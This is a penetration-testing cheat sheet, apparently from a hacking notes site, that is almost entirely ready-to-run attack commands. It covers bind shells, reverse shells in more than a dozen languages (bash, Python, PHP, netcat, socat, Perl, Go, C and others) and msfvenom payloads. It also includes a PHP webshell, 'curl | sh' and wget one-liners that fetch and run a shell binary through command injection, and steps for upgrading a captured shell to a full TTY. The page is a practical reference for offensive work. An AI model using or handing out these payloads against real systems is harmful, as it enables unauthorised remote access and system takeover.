Getting Access
Hack Responsibly.
Always ensure you have explicit permission to access any computer system before using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.
TODO: description, methodology, and script prep for each section (issue #15)
Add description and methodology as needed for each section
Prep all code examples for scripting (replace IPs and ports with variables, etc.)
Ensure code examples' variables are appropriate for their respective programming language
Bind shells
Bind shells are used when the attacker connects directly to the victim.
socat
socat - TCP4:$victim_ip:$port
Encrypted bind shell
To create an encrypted bind shell, first a self-signed certificate must be created. It must either be created on the victim machine, or transferred prior to using the bind shell.
openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 365 -out bind_shell.crt
cat bind_shell.key bind_shell.crt > bind_shell.pem
This command will create a new 2048-bit encryption key and certificate using the RSA algorithm. The certificate will be valid for 365 days. The key and certifcate information must be combined into one .pem file using cat
.
Next, use socat to create the bind shell using this .pem certificate. verify=0
will be used to disable SSL verification. Since you are using SSL on port 443 you need to run the listener with sudo
if the victim machine is running Linux.
#listener on victim
socat.exe OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:"C:\Windows\System32\cmd.exe"
#attacker client
socat - OPENSSL:$IP:443,verify=0
Reverse Shells
Reverse shells are used when the attacker gets the victim machine to connect back to their machine. Useful when firewalls or other security devices prevent bind shells.
Reverse Shell as a Service - https://shell.now.sh
https://github.com/lukechilds/reverse-shell
curl https://shell.now.sh/<ip>:<port> | sh
Bash Reverse Shells
TCP:
bash -i >& /dev/tcp/192.168.1.2/4444 0>&1
UDP:
sh -i >& /dev/udp/192.168.1.2/5555 0>&1
exec Reverse Shell
0<&196;exec 196<>/dev/tcp/$ip/$port; sh <&196 >&196 2>&196
exec 5<>/dev/tcp/$ip/$port && while read line 0<&5; do $line 2>&5 >&5; done
Python Reverse Shells
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.15.57",8099));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
export RHOST="192.168.1.2";export RPORT=4444;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.2",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
Using Socat UDP Listener
python -c 'import socket,pty,os;lhost = "10.10.15.80"; lport = 100; s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM); s.connect((lhost, lport)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); os.putenv("HISTFILE",'/dev/null'); pty.spawn("/bin/bash"); s.close();
#UDP Socat Listener
socat file:`tty`,echo=0,raw udp-listen:100
PHP Reverse Shell
php -r '$sock=fsockopen("192.168.1.2",80);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("192.168.1.2",4444);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'
PHP command injection webshell:
<?php system($_GET['variable_name']); ?>
Ruby Reverse Shell
ruby -rsocket -e'f=TCPSocket.open("192.168.1.2",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Telnet Reverse Shells
mknod backpipe p && telnet $ip $port 0<backpipe | /bin/bash 1>backpipe
telnet $ip $port1 | /bin/bash | telnet $ip $port2
rm -f /tmp/p; mknod /tmp/p p && telnet 192.168.1.2 4444 0/tmp/p
Netcat Reverse Shells
nc -e /bin/sh 192.168.1.2 80
rm -f /tmp/p; mknod /tmp/p p && nc 192.168.1.2 4444 0/tmp/p
rm -f /var/tmp/backpipe
mknod /var/tmp/backpipe p
nc $attack_ip $port 0</var/tmp/backpipe | /bin/bash 1>/var/tmp/backpipe
Socat Reverse Shell
socat tcp-connect:$IP:$port exec:"bash -li",pty,stderr,setsid,sigint,sane
#Listener on attacker machine
socat -d TCP-LISTEN:$port file:`tty`,raw,echo=0
#From victim
socat TCP4:$IP:$port exec:'/bin/bash -li',pty,stderr,setsid,sigint,sane
-d
increases verbosity of output
Golang Reverse Shell
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","192.168.1.2:4444");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go
Perl Reverse Shell
perl -e 'use Socket;$i="192.168.1.2";$p=8081;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"<IP>:<PORT>");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
Awk Reverse Shell
awk 'BEGIN {s = "/inet/tcp/0/192.168.1.2/4444"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
NodeJS Reverse Shell
require('child_process').exec('nc -e /bin/sh 192.168.1.2 4444')
JavaScript Reverse Shell
(function(){ var net = require("net"), cp = require("child_process"), sh = cp.spawn("/bin/sh", []); var client = new net.Socket(); client.connect(LPORT, "LHOST", function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); }); return /a/; })();
Java Reverse Shell
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/attackerip/443;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
C Reverse Shell
#include <stdio.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <arpa/inet.h>
#include <unistd.h>
int main ()
{
const char* ip = "192.168.1.2";
struct sockaddr_in addr;
addr.sin_family = AF_INET;
addr.sin_port = htons(4444);
inet_aton(ip, &addr.sin_addr);
int sockfd = socket(AF_INET, SOCK_STREAM, 0);
connect(sockfd, (struct sockaddr *)&addr, sizeof(addr));
for (int i = 0; i < 3; i++)
{
dup2(sockfd, i);
}
execve("/bin/sh", NULL, NULL);
return 0;
}
XTERM Reverse Shell
# Start an open X Server on your system (:1 – which listens on TCP port 6001)
apt-get install xnest
Xnest :1
# Then remember to authorise on your system the target IP to connect to you
xterm -display 127.0.0.1:1
# Run this INSIDE the spawned xterm on the open X Server
xhost +targetip
# Then on the target connect back to the your X Server
xterm -display attackerip:1
/usr/openwin/bin/xterm -display attackerip:1
or
$ DISPLAY=attackerip:0 xterm
Meterpreter Reverse Shells
Linux Non-Staged reverse TCP
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f elf >reversetcp.elf
Linux Staged reverse TCP
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f elf >reversetcp.elf
Upgrading remote shells
After catching a shell through netcat, you are placed in a shell that has very limited functionality. If the remote machine has python or python3 installed you can easily upgrade to a fully functional TTY shell.
Note: To check if the shell is a TTY shell use the tty
command.
Upgrade to fully interactive shell (python example):
#On victim machine
python -c 'import pty;pty.spawn("/bin/bash")'; #spawn python psuedo-shell
ctrl-z #send to background
#On attacker's machine
stty raw -echo #https://stackoverflow.com/questions/22832933/what-does-stty-raw-echo-do-on-os-x
stty size #get local number of rows & columns
fg #to return shell to foreground
#On victim machine
export SHELL=bash
stty rows $x columns $y #Set remote shell to x number of rows & y columns
export TERM=xterm-256color #allows you to clear console, and have color output
When using some shells such as zsh
or fish
on the attacking machine your shell will break after you try to upgrade it using this method. Some of the things I have found that help mitigate this are:
Use
rlwrap nc -lvnp
when setting up your listener,make sure not to put a space in your python pty command after the import,
type
stty size;stty raw -echo;fg
all on one line.
Finally, as a last resort, you could just switch to bash
instead when setting up your nc
listener.
Other Languages:
echo os.system('/bin/bash')
/bin/sh -i
#python3
python3 -c 'import pty; pty.spawn("/bin/sh")'
#perl
perl -e 'exec "/bin/sh";'
#ruby
exec "/bin/sh"
ruby -e 'exec "/bin/sh"'
#lua
lua -e "os.execute('/bin/sh')"
Using "Script" to upgrade to a TTY
Upgrade from a basic shell to a bash TTY using script
.
SHELL=/bin/bash script -q /dev/null
Using “Expect” To Get A TTY
If you’re lucky enough to have the Expect language installed just a few lines of code will get you a good enough TTY to run useful tools such as “ssh”, “su” and “login”.
#Create a script called `sh.exp`
#!/usr/bin/expect
# Spawn a shell, then allow the user to interact with it.
# The new shell will have a good enough TTY to run tools like ssh, su and login
spawn sh
interact
Using socat
Another option is to upload the binary for socat
to the victim machine and magically get a fully interactive shell. Download the appropriate binaries from https://github.com/andrew-d/static-binaries. Socat needs to be on both machines for this to work.
#Listener:
socat file:`tty`,raw,echo=0 tcp-listen:4444
#Victim:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.15.100:4444
socat one-liner
This one-liner can be injected wherever you can get command injection for an instant reverse shell. Point the path to the binary to your local http server if internet access is limited on the victim.
wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /dev/shm/socat; chmod +x /dev/shm/socat; /dev/shm/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.15.100:4444
Misc unsorted
bash -i >& /dev/tct/10.10.14.148/9001 0>&1
#URL encoded:
bash+-i+>%26+/dev/tcp/10.10.14.148/9001+0>%261
Bash
Some versions of bash can send you a reverse shell (this was tested on Ubuntu 10.10):
Works more reliably when prefixed with
bash -c
(thanks Ippsec!)
bash -c 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1'
PERL
Here’s a shorter, feature-free version of the perl-reverse-shell:
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
There’s also an alternative PERL revere shell here. (broken link?)
Python
This was tested under Linux / Python 2.7:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
PHP
This code assumes that the TCP connection uses file descriptor 3. This worked on my test system. If it doesn’t work, try 4, 5, 6…
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
If you want a .php file to upload, see the more featureful and robust php-reverse-shell.
Ruby
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Netcat
Netcat is rarely present on production systems and even if it is there are several version of netcat, some of which don’t support the -e option.
nc -e /bin/sh 10.0.0.1 1234
If you have the wrong version of netcat installed, Jeff Price points out here that you might still be able to get your reverse shell back like this:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
Java
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
xterm
One of the simplest forms of reverse shell is an xterm session. The following command should be run on the server. It will try to connect back to you (10.0.0.1) on TCP port 6001.
xterm -display 10.0.0.1:1
To catch the incoming xterm, start an X-Server (:1 – which listens on TCP port 6001). One way to do this is with Xnest (to be run on your system):
Xnest :1
You’ll need to authorize the target to connect to you (command also run on your host):
xhost +targetip
Resources
If you like this content and would like to see more, please consider buying me a coffee!
Last updated
Was this helpful?